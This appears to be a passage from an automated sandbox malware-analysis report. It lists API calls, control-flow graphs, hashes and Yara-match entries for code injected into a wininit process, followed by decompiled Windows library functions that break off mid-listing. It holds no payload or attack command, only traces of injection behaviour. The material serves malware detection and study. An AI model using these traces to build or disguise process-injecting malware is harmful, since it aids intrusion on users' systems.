                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000E3B93), ref: 000F891D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                                • Instruction ID: 2de99fdcd20d32bd2888d03012c7a8bf77d3c9afb39742b4a73d3ff568191fb4
                                                • Opcode Fuzzy Hash: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                                • Instruction Fuzzy Hash: AAE046B1200204AFDB18EF68CC48EE73768EF88350F018658FE0C9B242C631E910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 273 e7253-e725b; 274 e725d-e725e; 275 e72b8-e72ca call f3e50; 277 e729c-e729f; 278 e7260-e727d call f9b20 call f99d0; 283 e72fe-e7302; 284 e72cc-e72da PostThreadMessageW; 281 e72db-e72de; 282 e72a1-e72b3 call e9b40; 285 e72fd; 286 e72e0-e72fb call e92a0 PostThreadMessageW
                                                 • Edges: 273->274; 273->275; 274->277; 274->278; 275->283; 275->284; 277->281; 277->282; 281->285; 281->286; 282->275; 284->281; 285->283; 286->285
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000E72DA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000E72FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 544d0ca30ca3a73ef92cf80d5f9d354d0317ea1dbd6ca0cf474a473fe160780a
                                                • Instruction ID: 0bd70db0e69b5e803a38a3ae84b75ccc4e67e7ffc003315c05d66e30ed5c513e
                                                • Opcode Fuzzy Hash: 544d0ca30ca3a73ef92cf80d5f9d354d0317ea1dbd6ca0cf474a473fe160780a
                                                • Instruction Fuzzy Hash: D001F972A401647BDB21A6569C42FFE73589B40B10F150159FF08BE183E6A1690587E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 294 e7280-e72ad call fa140 call fad20; 299 e72b3-e72ca call f3e50; 300 e72ae call e9b40; 304 e72fe-e7302; 305 e72cc-e72de PostThreadMessageW; 307 e72fd; 308 e72e0-e72fb call e92a0 PostThreadMessageW
                                                 • Edges: 294->299; 294->300; 299->304; 299->305; 300->299; 305->307; 305->308; 307->304; 308->307
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000E72DA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000E72FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                                • Instruction ID: 2c4900cad46d0c7ea10aecc7d2920eb512e41389f28aaf0771d951db82e7b716
                                                • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                                • Instruction Fuzzy Hash: 6A01F271A8022D7BEB20A6959C03FFE776C5B01B50F040018FF08BA1C2EAD46A0682F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 506 f89f6-f89ff; 507 f8a56-f8a6a call f91e0; 508 f8a01-f8a40 call f91e0; 511 f8a6f-f8a84 LookupPrivilegeValueW
                                                 • Edges: 506->507; 506->508; 507->511
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ECFC2,000ECFC2,?,00000000,?,?), ref: 000F8A80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 4b579ca39a682b8107cbb67132f54e9b98f241f21df0ce00df381fb961ee1723
                                                • Instruction ID: 2e8a7ebfa09781db46d2f93618ea64a990ad30908b102ba6b7a38c3b03a24b2a
                                                • Opcode Fuzzy Hash: 4b579ca39a682b8107cbb67132f54e9b98f241f21df0ce00df381fb961ee1723
                                                • Instruction Fuzzy Hash: A4015BB5200208AFDB14DF58CC84EEB37A9EF88350F058154FA0C67642C930E914CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 514 e9b40-e9b69 call faf70; 517 e9b6f-e9b7d call fb390; 518 e9b6b-e9b6e; 521 e9b7f-e9b8a call fb610; 522 e9b8d-e9b9e call f9720; 527 e9bb7-e9bba; 528 e9ba0-e9bb4 LdrLoadDll
                                                 • Edges: 514->517; 514->518; 517->521; 517->522; 521->522; 522->527; 522->528; 528->527
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000E9BB2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction ID: fd7663460fafbec25dd2d72108e02b746e3107953828ca5e20ac3cc0582691a7
                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction Fuzzy Hash: B10140B5D0020DABDF10DAA5DD42FEDB3B89B54304F004195AA08A7642F630EB048B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph
                                                 • Blocks: 529 f8960-f89b8 call f91e0 CreateProcessInternalW
                                                 • Edges: none (single block)
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000F89B4
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: a98013e4001674ef6cb3fc37e09322e1101dc8b4781e11d86358595ff1999473
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 1701AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000ECCF0,?,?), ref: 000F746C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 59fb06d1aa1c136e8b86696eddacef487bb660dd6014ac6a24646caa89fd20f8
                                                • Instruction ID: 20900e2d5a05a5edf078526415f6d0cf102a67a7e5003a6cf37f1f31c8e95670
                                                • Opcode Fuzzy Hash: 59fb06d1aa1c136e8b86696eddacef487bb660dd6014ac6a24646caa89fd20f8
                                                • Instruction Fuzzy Hash: 78F0E5723806143AE33169688C02FE77A9D8B85B15F544029F79DEF6C3DAD5F84282D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000ECCF0,?,?), ref: 000F746C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
                                                • Instruction ID: e8bc1fbcc3ff186e4d2005aea7192b3a89181e99dcbca79ad9b412ac54432941
                                                • Opcode Fuzzy Hash: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
                                                • Instruction Fuzzy Hash: ABE06D333802083AE22065A99C02FE7B69C8B81B24F540026FB4DEA6C2D595F90152A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ECFC2,000ECFC2,?,00000000,?,?), ref: 000F8A80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 47e8e0e523213e13c9b214feb9b4f8d069eb38ca25052b67dab34f63c81d37f4
                                                • Instruction ID: 2bc0d23e6c76350f7291a99afbaa63617476d198c875a22e22edbb992ecdd1fe
                                                • Opcode Fuzzy Hash: 47e8e0e523213e13c9b214feb9b4f8d069eb38ca25052b67dab34f63c81d37f4
                                                • Instruction Fuzzy Hash: 5AE0E5752041046FDB00DF69DC85E977B69EF81250F00465EFC8957106C534B405CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(000F3536,?,000F3CAF,000F3CAF,?,000F3536,?,?,?,?,?,00000000,00000000,?), ref: 000F88DD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 4f72fa366b37d832a1a8319f864fa93d742f6f12058a8c0faead5da3c4e9727e
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 38E012B1200208ABDB14EF99CC45EA777ACAF88650F118558FE085B242C630F910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ECFC2,000ECFC2,?,00000000,?,?), ref: 000F8A80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: f2fe83c76d1b5d9a072489afcb4d2cc7034c7e37b7a0b451402f1adf97a2441e
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 86E01AB12002086BDB10EF49CC85EE737ADAF88650F018164FE0857242C930F910CBF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,000E7C83,?), ref: 000ED45B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 3fb9cf6ab301c5a85005ea8dfb1daeeff85bdba07a826920891839b0a0c7d5c8
                                                • Instruction ID: cce71db6f245c93cc236357af817c8f2d4033a9ca37136994f42b97e84916469
                                                • Opcode Fuzzy Hash: 3fb9cf6ab301c5a85005ea8dfb1daeeff85bdba07a826920891839b0a0c7d5c8
                                                • Instruction Fuzzy Hash: 18E0C2766402063FEB10EAB49C03FA677959F51794F0D40A8F549EB2C3DA60E1018610
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,000E7C83,?), ref: 000ED45B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                • Instruction ID: e735f35fc90ee8bd46d8646e4cbf6d4cb715a86d2e0baa3f0098a9ad89a92241
                                                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                • Instruction Fuzzy Hash: BED0A7717503083BE710FAA49C03F6633CC9F55B54F494064FA48E73C3D960F5008161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 94%
/* Decompiled listing produced by the Joe Sandbox IDA plugin (not hand-written code).
   The function queries the policy values named in the string literals below, copies each
   ';'-separated list into a heap buffer, counts the entries that pass E02545553, and stores
   the buffers and counts in the caller's structure (_a4). The comments added here only
   mark the Windows constants that can be read directly from the code. */
E02548788(signed int __ecx, void* __edx, signed int _a4) {
	signed int _v8;
	short* _v12;
	void* _v16;
	signed int _v20;
	char _v24;
	signed int _v28;
	signed int _v32;
	char _v36;
	signed int _v40;
	char _v44;
	signed int _v48;
	signed int _v52;
	signed int _v56;
	signed int _v60;
	char _v68;
	void* _t216;
	intOrPtr _t231;
	short* _t235;
	intOrPtr _t257;
	short* _t261;
	intOrPtr _t284;
	intOrPtr _t288;
	void* _t314;
	signed int _t318;
	short* _t319;
	intOrPtr _t321;
	void* _t328;
	void* _t329;
	char* _t332;
	signed int _t333;
	signed int* _t334;
	void* _t335;
	void* _t338;
	void* _t339;

	_t328 = __edx;
	_t322 = __ecx;
	_t318 = 0;
	_t334 = _a4;
	_v8 = 0;
	_v28 = 0;
	_v48 = 0;
	_v20 = 0;
	_v40 = 0;
	_v32 = 0;
	_v52 = 0;
	if(_t334 == 0) {
		_t329 = 0xc000000d; /* STATUS_INVALID_PARAMETER: no output structure supplied */
		L49:
		/* common exit: write all collected results into the caller's structure */
		_t334[0x11] = _v56;
		 *_t334 =  *_t334 | 0x00000800;
		_t334[0x12] = _v60;
		_t334[0x13] = _v28;
		_t334[0x17] = _v20;
		_t334[0x16] = _v48;
		_t334[0x18] = _v40;
		_t334[0x14] = _v32;
		_t334[0x15] = _v52;
		return _t329;
	}
	_v56 = 0;
	if(E02548460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
		_v56 = 1;
		if(_v8 != 0) {
			/* *[fs:0x18] is the TEB, +0x30 the PEB, +0x18 PEB->ProcessHeap (32-bit layout);
			   E0252E025 frees the value buffer from that heap */
			_t207 = E0252E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
		}
		_push(1);
		_v8 = _t318;
		E0254718A(_t207);
		_t335 = _t335 + 4;
	}
	_v60 = _v60 | 0xffffffff;
	if(E02548460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
		_t333 =  *_v8;
		_v60 = _t333;
		_t314 = E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
		_push(_t333);
		_v8 = _t318;
		E0254718A(_t314);
		_t335 = _t335 + 4;
	}
	_t216 = E02548460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
	_t332 = ";"; /* separator used to split the language lists below */
	if(_t216 < 0) {
		L17:
		if(E02548460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
			L30:
			if(E02548460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
				L46:
				_t329 = 0; /* STATUS_SUCCESS */
				L47:
				if(_v8 != _t318) {
					E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
				}
				if(_v28 != _t318) {
					if(_v20 != _t318) {
						E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
						_v20 = _t318;
						_v40 = _t318;
					}
				}
				goto L49;
			}
			_t231 = _v24;
			_t322 = _t231 + 4;
			_push(_t231);
			_v52 = _t322;
			E0254718A(_t231);
			if(_t322 == _t318) {
				_v32 = _t318;
			} else {
				_v32 = E0252E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
			}
			if(_v32 == _t318) {
				_v52 = _t318;
				L58:
				_t329 = 0xc0000017; /* STATUS_NO_MEMORY: heap allocation failed */
				goto L47;
			} else {
				E02522340(_v32, _v8, _v24);
				_v16 = _v32;
				_a4 = _t318;
				_t235 = E0253E679(_v32, _t332);
				while(1) {
					_t319 = _t235;
					if(_t319 == 0) {
						break;
					}
					 *_t319 = 0;
					_t321 = _t319 + 2;
					E0252E2A8(_t322,  &_v68, _v16);
					if(E02545553(_t328,  &_v68,  &_v36) != 0) {
						_a4 = _a4 + 1;
					}
					_v16 = _t321;
					_t235 = E0253E679(_t321, _t332);
					_pop(_t322);
				}
				_t236 = _v16;
				if( *_v16 != _t319) {
					E0252E2A8(_t322,  &_v68, _t236);
					if(E02545553(_t328,  &_v68,  &_v36) != 0) {
						_a4 = _a4 + 1;
					}
				}
				if(_a4 == 0) {
					E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
					_v52 = _v52 & 0x00000000;
					_v32 = _v32 & 0x00000000;
				}
				if(_v8 != 0) {
					E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
				}
				_v8 = _v8 & 0x00000000;
				_t318 = 0;
				goto L46;
			}
		}
		_t257 = _v24;
		_t322 = _t257 + 4;
		_push(_t257);
		_v40 = _t322;
		E0254718A(_t257);
		_t338 = _t335 + 4;
		if(_t322 == _t318) {
			_v20 = _t318;
		} else {
			_v20 = E0252E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
		}
		if(_v20 == _t318) {
			_v40 = _t318;
			goto L58;
		} else {
			E02522340(_v20, _v8, _v24);
			_v16 = _v20;
			_a4 = _t318;
			_t261 = E0253E679(_v20, _t332);
			_t335 = _t338 + 0x14;
			while(1) {
				_v12 = _t261;
				if(_t261 == _t318) {
					break;
				}
				_v12 = _v12 + 2;
				 *_v12 = 0;
				E0252E2A8(_v12,  &_v68, _v16);
				if(E02545553(_t328,  &_v68,  &_v36) != 0) {
					_a4 = _a4 + 1;
				}
				_v16 = _v12;
				_t261 = E0253E679(_v12, _t332);
				_pop(_t322);
			}
			_t269 = _v16;
			if( *_v16 != _t318) {
				E0252E2A8(_t322,  &_v68, _t269);
				if(E02545553(_t328,  &_v68,  &_v36) != 0) {
					_a4 = _a4 + 1;
				}
			}
			if(_a4 == _t318) {
				E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
				_v40 = _t318;
				_v20 = _t318;
			}
			if(_v8 != _t318) {
				E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
			}
			_v8 = _t318;
			goto L30;
		}
	}
	_t284 = _v24;
	_t322 = _t284 + 4;
	_push(_t284);
	_v48 = _t322;
	E0254718A(_t284);
	_t339 = _t335 + 4;
	if(_t322 == _t318) {
		_v28 = _t318;
	} else {
		_v28 = E0252E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
	}
	if(_v28 == _t318) {
		_v48 = _t318;
		goto L58;
	} else {
		E02522340(_v28, _v8, _v24);
		_v16 = _v28;
		_a4 = _t318;
		_t288 = E0253E679(_v28, _t332);
		_t335 = _t339 + 0x14;
		while(1) {
			_v12 = _t288;
			if(_t288 == _t318) {
				break;
			}
			_v12 = _v12 + 2;
			 *_v12 = 0;
			E0252E2A8(_v12,  &_v68, _v16);
			if(E02545553(_t328,  &_v68,  &_v36) != 0) {
				_a4 = _a4 + 1;
			}
			_v16 = _v12;
			_t288 = E0253E679(_v12, _t332);
			_pop(_t322);
		}
		_t296 = _v16;
		if( *_v16 != _t318) {
			E0252E2A8(_t322,  &_v68, _t296);
			if(E02545553(_t328,  &_v68,  &_v36) != 0) {
				_a4 = _a4 + 1;
			}
		}
		if(_a4 == _t318) {
			E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
			_v48 = _t318;
			_v28 = _t318;
		}
		if(_v8 != _t318) {
			E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
		}
		_v8 = _t318;
		goto L17;
	}
}


                                                APIs
                                                Strings
                                                • WindowsExcludedProcs, xrefs: 025487C1
                                                • Kernel-MUI-Language-SKU, xrefs: 025489FC
                                                • Kernel-MUI-Language-Disallowed, xrefs: 02548914
                                                • Kernel-MUI-Language-Allowed, xrefs: 02548827
                                                • Kernel-MUI-Number-Allowed, xrefs: 025487E6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: b309d1b2f09ed263c847303a027eecc8ace908df801b6c8165128286a48551a4
                                                • Instruction ID: 8a1d2e745bdadb93ff103b3b5c7682807e19f8da41f8812dba7d1e03305f659d
                                                • Opcode Fuzzy Hash: b309d1b2f09ed263c847303a027eecc8ace908df801b6c8165128286a48551a4
                                                • Instruction Fuzzy Hash: 92F1FAB2D0021AEFCF11DF95C9849EEBBBAFF48308F14446AE505A7250EB34AA45DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 38%
                                                			E025613CB(intOrPtr* _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _t71;
                                                				signed int _t78;
                                                				signed int _t86;
                                                				char _t90;
                                                				signed int _t91;
                                                				signed int _t96;
                                                				intOrPtr _t108;
                                                				signed int _t114;
                                                				void* _t115;
                                                				intOrPtr _t128;
                                                				intOrPtr* _t129;
                                                				void* _t130;
                                                
                                                				_t129 = _a4;
                                                				_t128 = _a8;
                                                				_t116 = 0;
                                                				_t71 = _t128 + 0x5c;
                                                				_v8 = 8;
                                                				_v20 = _t71;
                                                				if( *_t129 == 0) {
                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                						if(_t96 != 0) {
                                                							L38:
                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                								goto L5;
                                                							} else {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t86 = E02557707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                								L36:
                                                								return _t128 + _t86 * 2;
                                                							}
                                                						}
                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                						if(_t114 == 0) {
                                                							L33:
                                                							_t115 = 0x2522926;
                                                							L35:
                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                							_t86 = E02557707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                							goto L36;
                                                						}
                                                						if(_t114 != 0xffff) {
                                                							_t116 = 0;
                                                							goto L38;
                                                						}
                                                						if(_t114 != 0) {
                                                							_t115 = 0x2529cac;
                                                							goto L35;
                                                						}
                                                						goto L33;
                                                					}
                                                				} else {
                                                					L5:
                                                					_a8 = _t116;
                                                					_a4 = _t116;
                                                					_v12 = _t116;
                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                							_v8 = 6;
                                                						}
                                                					}
                                                					_t90 = _v8;
                                                					if(_t90 <= _t116) {
                                                						L11:
                                                						if(_a8 - _a4 <= 1) {
                                                							_a8 = _t116;
                                                							_a4 = _t116;
                                                						}
                                                						_t91 = 0;
                                                						if(_v8 <= _t116) {
                                                							L22:
                                                							if(_v8 < 8) {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t128 = _t128 + E02557707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                							}
                                                							return _t128;
                                                						} else {
                                                							L14:
                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                									_push(":");
                                                									_push(_t71 - _t128 >> 1);
                                                									_push(_t128);
                                                									_t128 = _t128 + E02557707() * 2;
                                                									_t71 = _v20;
                                                									_t130 = _t130 + 0xc;
                                                								}
                                                								_t78 = E02557707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                								_t130 = _t130 + 0x10;
                                                							} else {
                                                								_push(L"::");
                                                								_push(_t71 - _t128 >> 1);
                                                								_push(_t128);
                                                								_t78 = E02557707();
                                                								_t130 = _t130 + 0xc;
                                                								_t91 = _a8 - 1;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							_t128 = _t128 + _t78 * 2;
                                                							_t71 = _v20;
                                                							if(_t91 >= _v8) {
                                                								goto L22;
                                                							}
                                                							_t116 = 0;
                                                							goto L14;
